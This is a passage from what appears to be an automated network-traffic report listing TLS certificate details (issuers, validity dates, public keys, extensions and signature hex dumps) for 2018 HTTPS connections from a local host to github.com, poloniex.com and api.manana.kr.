=.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: github.com DNSName: www.github.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C9 C2 53 61 66 9D 5F AB 25 F4 26 CD 0F 38 9A A8 ..Saf._.%.&..8..0010: 49 EA 48 A9 I.H.]]] Algorithm: [SHA256withRSA] Signature:0000: 70 0F 5A 96 A7 58 E5 BF 8A 9D A8 27 98 2B 00 7F p.Z..X.....'.+..0010: 26 A9 07 DA BA 7B 82 54 4F AF 69 CF BC F2 59 03 &......TO.i...Y.0020: 2B F2 D5 74 58 25 D8 1E A4 20 76 62 60 29 73 2A +..tX%... vb`)s*0030: D7 DC CC 6F 77 85 6B CA 6D 24 F8 35 13 47 3F D2 ...ow.k.m$.5.G?.0040: E2 69 0A 9D 34 2D 7B 7B 9B CD 1E 75 D5 50 6C 3E .i..4-.....u.Pl>0050: CB 1C A3 30 B1 AA 92 07 A9 3A 76 76 45 BD 78 91 ...0.....:vvE.x.0060: C4 CE 1A 9E 22 E4 0B 89 BA E6 8C C1 79 82 A3 B8 ....".......y...0070: D4 C0 FC 1F 2D ED 4D 52 55 41 2A A8 3A 2C AD 07 ....-.MRUA*.:,..0080: 72 AE 0A D2 C6 67 C4 4F 07 17 18 99 F7 65 A9 57 r....g.O.....e.W0090: 60 15 5A 34 4C 11 CF F6 CF 6B 21 36 80 EF C6 F1 `.Z4L....k!6....00A0: 54 63 26 35 39 EE BB C4 83 64 9B 24 0A 73 EC A0 Tc&59....d.$.s..00B0: 48 16 73 C8 B9 D7 48 55 56 98 7A F7 BB 97 5C 69 H.s...HUV.z...\i00C0: A4 06 18 04 78 DA FE 98 76 BE 22 2F 7F 07 77 87 ....x...v."/..w.00D0: 4E 88 19 9A F8 55 EC 5C 12 2A 59 48 DB 49 3E 15 N....U.\.*YH.I>.00E0: 5E 67 5A A2 5E EE CC 53 28 8C 0E 33 93 14 03 64 ^gZ.^..S(..3...d00F0: 0B C5 E5 78 09 94 01 5A 75 FC 92 9D AF ED 7A 29 ...x...Zu.....z)]
    Nov 2, 2018 10:59:50.179255009 MEZ44349240192.30.253.112192.168.0.50CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 ............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]
    Nov 2, 2018 10:59:50.274899006 MEZ44349241104.20.13.48192.168.0.50CN=*.poloniex.com, OU=Domain Control ValidatedCN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BEFri Dec 04 20:50:49 CET 2015Tue Dec 04 20:50:49 CET 2018[[ Version: V3 Subject: CN=*.poloniex.com, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 23424993325525623255851412666516885995553008773377235540430219021804552649361025081019212251929462057913870788953628748323213297497587067652131747584777327702210021553062163159846795182151842997043336471096268829956046402766420905606938160680674934702931972232478634002775391325725206224374000652652598835217563128118907240360490465193760792317062097374028988295621368668688585580904167778114301891037422055269618192941995902225754491406199698645450279202549513176629284877666812917590126302896332764322984701289536069459144054326071806466775530796457523625528880560663484182741332983644177180022002276374843018235097 public exponent: 65537 Validity: [From: Fri Dec 04 20:50:49 CET 2015, To: Tue Dec 04 20:50:49 CET 2018] Issuer: CN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BE SerialNumber: [ 11215fab cd6f1449 8be94058 583338a5 2357]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://secure2.alphassl.com/cacert/gsalphasha2g2r1.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp2.globalsign.com/gsalphasha2g2]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: F5 CD D5 3C 08 50 F9 6A 4F 3A B7 97 DA 56 83 E6 ...<.P.jO:...V..0010: 69 D2 68 F7 i.h.]][3]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl2.alphassl.com/gs/gsalphasha2g2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 26 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 6C .&https://www.gl0010: 6F 62 61 6C 73 69 67 6E 2E 63 6F 6D 2F 72 65 70 obalsign.com/rep0020: 6F 73 69 74 6F 72 79 2F ository/]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.poloniex.com DNSName: poloniex.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 6B B4 CB 04 D8 5B C2 2C 59 0D D8 0C F9 23 9C 70 k....[.,Y....#.p0010: EA 2A 3D 9D .*=.]]] Algorithm: [SHA256withRSA] Signature:0000: AA FE 71 04 3B EE 68 5F F2 FB 39 65 D2 D7 C4 08 ..q.;.h_..9e....0010: B3 D7 C3 41 0D 99 B8 82 0B A0 01 9A 23 C3 20 1F ...A........#. .0020: D1 40 6E 7E C4 85 D1 7D B1 A2 A6 89 91 D1 D6 DE .@n.............0030: B6 06 81 BF 7C 42 5B 90 C6 2E 9F B4 8E BE 92 E3 .....B[.........0040: E5 11 32 64 E1 D3 32 17 7A A7 33 57 4E 39 BA 74 ..2d..2.z.3WN9.t0050: 7B 54 A7 B2 AC 00 DB FB FE 9C 5D F4 9A F3 CE B4 .T........].....0060: E9 82 2F 6C F3 0B DA 22 11 42 49 5F 7F FE D3 34 ../l...".BI_...40070: 28 CB 79 D2 0B E0 85 B3 DF 78 4D 3B 92 48 AA 37 (.y......xM;.H.70080: B8 96 72 8F 55 22 B3 62 97 28 A1 44 C6 B8 24 A2 ..r.U".b.(.D..$.0090: 87 AF 28 EE EA 02 6A 49 8F 56 AB F3 2F DA DF 8C ..(...jI.V../...00A0: 00 30 A6 71 C1 32 CC 59 C4 E3 1A 93 98 76 72 62 .0.q.2.Y.....vrb00B0: 7E FF DC 0B A1 DF 62 8E 0F 39 98 1C B6 DD 12 FD ......b..9......00C0: E3 F2 42 C1 6A 88 39 41 E3 57 81 25 59 58 E7 05 ..B.j.9A.W.%YX..00D0: 05 B2 D1 7F 9F 74 6B 3A F4 EE BD 2D 4C 64 19 ED .....tk:...-Ld..00E0: A3 72 76 48 03 DD B0 2E 1D 6F 0E 3D 4A 79 30 31 .rvH.....o.=Jy0100F0: DD 55 DB 25 AC 1A 1E 80 8D 27 F9 F1 CF 19 8A 2E .U.%.....'......]
    Nov 2, 2018 10:59:50.274899006 MEZ44349241104.20.13.48192.168.0.50CN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BECN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEThu Feb 20 11:00:00 CET 2014Tue Feb 20 11:00:00 CET 2024[[ Version: V3 Subject: CN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BE Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27520899916995544699120289610785911580232419013509193231998099646688178450054831404416383462286238432567057938549109886184796340526228759428166367597304915423659396025504945765886603859623378618911872122802111932514241880229405232315994504096229614924726984379185908881668600156091665652630901340515643491317795832628660171608546326447604278184406709105007320584198546272574898341456205082918050376190568641282655809475030280919653764466141979824656695467596018503425501248265331566162701046521394403172823255619427882970636969740654126223249839771377089662208709527843607067428126685784984775159825979015328223964519 public exponent: 65537 Validity: [From: Thu Feb 20 11:00:00 CET 2014, To: Tue Feb 20 11:00:00 CET 2024] Issuer: CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE SerialNumber: [ 04000000 0001444e f03631]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.globalsign.com/rootr1]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 60 7B 66 1A 45 0D 97 CA 89 50 2F 7D 04 CD 34 A8 `.f.E....P/...4.0010: FF FC FD 4B ...K]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.globalsign.net/root.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 24 68 74 74 70 73 3A 2F 2F 77 77 77 2E 61 6C .$https://www.al0010: 70 68 61 73 73 6C 2E 63 6F 6D 2F 72 65 70 6F 73 phassl.com/repos0020: 69 74 6F 72 79 2F itory/]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: F5 CD D5 3C 08 50 F9 6A 4F 3A B7 97 DA 56 83 E6 ...<.P.jO:...V..0010: 69 D2 68 F7 i.h.]]] Algorithm: [SHA256withRSA] Signature:0000: 60 40 68 16 47 E7 16 8D DB 5C A1 56 2A CB F4 5C `@h.G....\.V*..\0010: 9B B0 1E A2 4B F5 CB 02 3F F8 0B A1 F2 A7 42 D4 ....K...?.....B.0020: B7 4C EB E3 66 80 F3 25 43 78 2E 1B 17 56 07 52 .L..f..%Cx...V.R0030: 18 CB D1 A8 EC E6 FB 73 3E A4 62 8C 80 B4 D2 C5 .......s>.b.....0040: 12 73 A3 D3 FA 02 38 BE 63 3D 84 B8 99 C1 F1 BA .s....8.c=......0050: F7 9F C3 40 D1 58 18 53 C1 62 DD AF 18 42 7F 34 ...@.X.S.b...B.40060: 4E C5 43 D5 71 B0 30 00 C7 E3 90 AE 3F 57 86 97 N.C.q.0.....?W..0070: CE EA 0C 12 8E 22 70 E3 66 A7 54 7F 2E 28 CB D4 ....."p.f.T..(..0080: 54 D0 B3 1E 62 67 08 F9 27 E1 CB E3 66 B8 24 1B T...bg..'...f.$.0090: 89 6A 89 44 65 F2 D9 4C D2 58 1C 8C 4E C0 95 A1 .j.De..L.X..N...00A0: D4 EF 67 2F 38 20 E8 2E FF 96 51 F0 BA D8 3D 92 ..g/8 ....Q...=.00B0: 70 47 65 1C 9E 73 72 B4 60 0C 5C E2 D1 73 76 E0 pGe..sr.`.\..sv.00C0: AF 4E E2 E5 37 A5 45 2F 8A 23 3E 87 C7 30 E6 31 .N..7.E/.#>..0.100D0: 38 7C F4 DD 52 CA F3 53 04 25 57 56 66 94 E8 0B 8...R..S.%WVf...00E0: EE E6 03 14 4E EE FD 6D 94 64 9E 5E CE 79 D4 B2 ....N..m.d.^.y..00F0: A6 CF 40 B1 44 A8 3E 87 19 5E E9 F8 21 16 59 53 ..@.D.>..^..!.YS]
    Nov 2, 2018 10:59:51.315047979 MEZ44349242133.130.107.154192.168.0.50CN=api.manana.krCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USFri Oct 26 20:00:07 CEST 2018Thu Jan 24 19:00:07 CET 2019[[ Version: V3 Subject: CN=api.manana.kr Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 22054184771908818421351435170818872834794068638781958509919367961985802257119087902582091443857554694807544321988502974845407431158610444863685376334379460450363906780208724042639016348405478936072255972390653809142606680273591396812216884645039283045394406601059603294568966295178675098201931450009439311127869039791902351630148854801300080902807217024692402924953552109535802362037854737336194296178142607571571040114363660032278992810993972088416362396375506458485770711433601514032153329619447056321401764939677514044840242929270007838272351588086460767303897083994877230447663785647695194121881578573029168979567 public exponent: 65537 Validity: [From: Fri Oct 26 20:00:07 CEST 2018, To: Thu Jan 24 19:00:07 CET 2019] Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US SerialNumber: [ 0443c5a3 490367ea afb076de 0a84e1b2 5b88]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 81 F4 04 81 F1 00 EF 00 76 00 E2 69 4B AE 26 .........v..iK.&0010: E8 E9 40 09 E8 86 1B B6 3B 83 D4 3E E7 FE 74 88 ..@.....;..>..t.0020: FB A4 8F 28 93 01 9D DD F1 DB FE 00 00 01 66 B1 ...(..........f.0030: BF 77 A1 00 00 04 03 00 47 30 45 02 20 34 4C 3C .w......G0E. 4L<0040: 65 67 EF 0C DF 23 77 8D 1F 3A E7 FE 14 7B 25 8F eg...#w..:....%.0050: AB 7E 71 28 1B CF 81 89 4C 39 01 1F 63 02 21 00 ..q(....L9..c.!.0060: D8 68 5B 89 B1 78 25 0C 0F F3 A7 F7 6E C6 9B 2E .h[..x%.....n...0070: 5E 27 C2 86 D4 7B FF 59 0E 30 2F 80 DD AE 76 82 ^'.....Y.0/...v.0080: 00 75 00 29 3C 51 96 54 C8 39 65 BA AA 50 FC 58 .u.)<Q.T.9e..P.X0090: 07 D4 B7 6F BF 58 7A 29 72 DC A4 C3 0C F4 E5 45 ...o.Xz)r......E00A0: 47 F4 78 00 00 01 66 B1 BF 79 8E 00 00 04 03 00 G.x...f..y......00B0: 46 30 44 02 20 1A FE CB 3C 7B 8D EB B3 BE 49 74 F0D. ...<.....It00C0: 5C CA 56 71 E4 04 88 DF 78 77 32 B6 5E 88 0A 02 \.Vq....xw2.^...00D0: B4 5E 8C 29 BC 02 20 21 AD E8 E4 42 A9 03 36 B2 .^.).. !...B..6.00E0: 34 F2 51 07 D9 1E 20 8F 6B 1B FB 26 B4 07 A0 BC 4.Q... .k..&....00F0: 5B D2 3F 9E FA 6C 03 [.?..l.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.int-x3.letsencrypt.org, accessMethod: caIssuers accessLocation: URIName: http://cert.int-x3.letsencrypt.org/]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1A 68 74 74 70 3A 2F 2F 63 70 73 2E 6C 65 74 ..http://cps.let0010: 73 65 6E 63 72 79 70 74 2E 6F 72 67 sencrypt.org], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 9E 0C 81 9B 54 68 69 73 20 43 65 72 74 69 0.....This Certi0010: 66 69 63 61 74 65 20 6D 61 79 20 6F 6E 6C 79 20 ficate may only 0020: 62 65 20 72 65 6C 69 65 64 20 75 70 6F 6E 20 62 be relied upon b0030: 79 20 52 65 6C 79 69 6E 67 20 50 61 72 74 69 65 y Relying Partie0040: 73 20 61 6E 64 20 6F 6E 6C 79 20 69 6E 20 61 63 s and only in ac0050: 63 6F 72 64 61 6E 63 65 20 77 69 74 68 20 74 68 cordance with th0060: 65 20 43 65 72 74 69 66 69 63 61 74 65 20 50 6F e Certificate Po0070: 6C 69 63 79 20 66 6F 75 6E 64 20 61 74 20 68 74 licy found at ht0080: 74 70 73 3A 2F 2F 6C 65 74 73 65 6E 63 72 79 70 tps://letsencryp0090: 74 2E 6F 72 67 2F 72 65 70 6F 73 69 74 6F 72 79 t.org/repository00A0: 2F /]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: api.manana.kr][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: F6 84 6D 8C 03 DA AF 2B 3D A4 9C 0A E9 B8 50 F7 ..m....+=.....P.0010: 58 03 B7 D3 X...]]] Algorithm: [SHA256withRSA] Signature:0000: 06 31 8C A7 8B 25 01 F7 2C 52 65 F0 C3 6D 0A 9C .1...%..,Re..m..0010: 53 49 EF A8 B4 ED 91 4D DA 16 D2 12 A9 2D 9A 3B SI.....M.....-.;0020: 31 98 98 DC 7B D7 76 47 29 E2 01 23 D9 72 05 E6 1.....vG)..#.r..0030: 1F E3 3B 6F 4A E5 E6 C7 D6 2A EF 5D 09 52 19 ED ..;oJ....*.].R..0040: 19 F7 15 F4 10 45 2D F9 E9 54 4D E6 D0 88 4D 00 .....E-..TM...M.0050: A1 4B 4F 9F 79 FA F2 F4 67 7B A3 F0 D1 DC 12 14 .KO.y...g.......0060: 0F 0E C5 22 63 8C 86 B6 ED 5C 99 E9 87 42 88 52 ..."c....\...B.R0070: F8 90 C5 55 CE 5C 59 ED 07 D3 8B 13 E1 61 0D 8A ...U.\Y......a..0080: 23 A2 9A 11 BF B9 9C B5 AF A2 E9 E8 4A FA B9 44 #...........J..D0090: F1 04 60 11 57 A3 4D C9 9D BB 8D 64 B8 1A EA BB ..`.W.M....d....00A0: AE 78 EC CA C8 05 B0 07 DE 6E A9 8A 52 E2 D4 07 .x.......n..R...00B0: 64 39 01 4F E3 B6 49 1F 19 95 C0 50 28 F5 DB 93 d9.O..I....P(...00C0: C8 E3 2B BB 9B 7E D9 A3 DD 31 10 9B 03 DE 38 7F ..+......1....8.00D0: 8D DA 17 9A 24 B0 21 EC 1C 52 65 72 34 B4 D1 A4 ....$.!..Rer4...00E0: 51 63 C7 BD 13 1C 31 96 30 B6 AC BA 4A 62 A4 AA Qc....1.0...Jb..00F0: 97 1C 39 75 E4 BB F1 5E 6A 9A 4C C7 23 5A 28 29 ..9u...^j.L.#Z()]
    Nov 2, 2018 10:59:51.315047979 MEZ44349242133.130.107.154192.168.0.50CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021[[ Version: V3 Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499 public exponent: 65537 Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021] Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. .....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 ]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]
    Nov 2, 2018 10:59:55.252080917 MEZ44349245151.101.0.133192.168.0.50CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 23 01:00:00 CET 2017Wed May 13 14:00:00 CEST 2020[[ Version: V3 Subject: CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25099697626048321606202818344071502550576411888331701071141161223694675869786745800889617243213642455258158495927201678345350021623733344893724275172963412722339878198389644829083964717190878070492781167669895599575788154081255061130305535549411705316507008410948527417224113219034434540514365587659572158721996877966754415715730209401768225239036749296683522925986561048065207836614684495060962115342387644979615572735292237094507662116283631106341692208293437519645282962451912142974140521707187040079470650176250023234488760804440782477843096472385145915778215630371344833626811599300515164458563730525132815920871 public exponent: 65537 Validity: [From: Thu Mar 23 01:00:00 CET 2017, To: 